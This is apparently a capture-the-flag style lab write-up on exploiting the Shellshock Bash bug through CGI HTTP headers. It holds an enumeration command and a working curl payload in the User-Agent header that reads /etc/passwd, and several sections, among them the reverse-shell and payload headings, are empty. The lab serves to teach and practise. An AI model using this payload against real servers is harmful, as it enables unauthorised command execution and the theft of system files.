CGI Shellshock Attacks
π― Objective: Exploit Shellshock vulnerability in CGI applications via HTTP headers to achieve remote code execution.
Overview
Shellshock (CVE-2014-6271) affects GNU Bash up to version 4.3, allowing command execution through environment variables in CGI applications. Vulnerability lies in Bash's improper handling of function definitions in environment variables.
HTB Academy Lab Solution
Lab: Shellshock Exploitation
Question: "Enumerate the host, exploit the Shellshock vulnerability, and submit the contents of the flag.txt file located on the server."
Step 1: CGI Script Discovery
# Enumerate CGI scripts
gobuster dir -u http://TARGET/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -x cgi
# Expected finding: access.cgi
# URL: http://TARGET/cgi-bin/access.cgiStep 2: Vulnerability Confirmation
# Test Shellshock via User-Agent header
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://TARGET/cgi-bin/access.cgi
# If vulnerable: /etc/passwd contents returnedStep 3: Command Execution
Step 4: Reverse Shell (Alternative)
Answer: [FLAG_CONTENT] (extract from flag.txt)
Technical Details
Vulnerability Mechanism
CGI Attack Vector
Environment variables processed by CGI
HTTP headers become environment variables
User-Agent, Referer, Cookie headers exploitable
Function definition
() { :; };followed by malicious commands
Common Payloads
Attack Summary
Prerequisites:
CGI application using Bash
Vulnerable Bash version (< 4.3 unpatched)
HTTP access to CGI scripts
Impact:
Remote code execution as web server user
File system access for data exfiltration
Reverse shell for interactive access
Potential privilege escalation vector
π‘ Pro Tip: Shellshock is common in legacy systems and IoT devices - always test CGI endpoints with environment variable injection when discovered during enumeration.
Last updated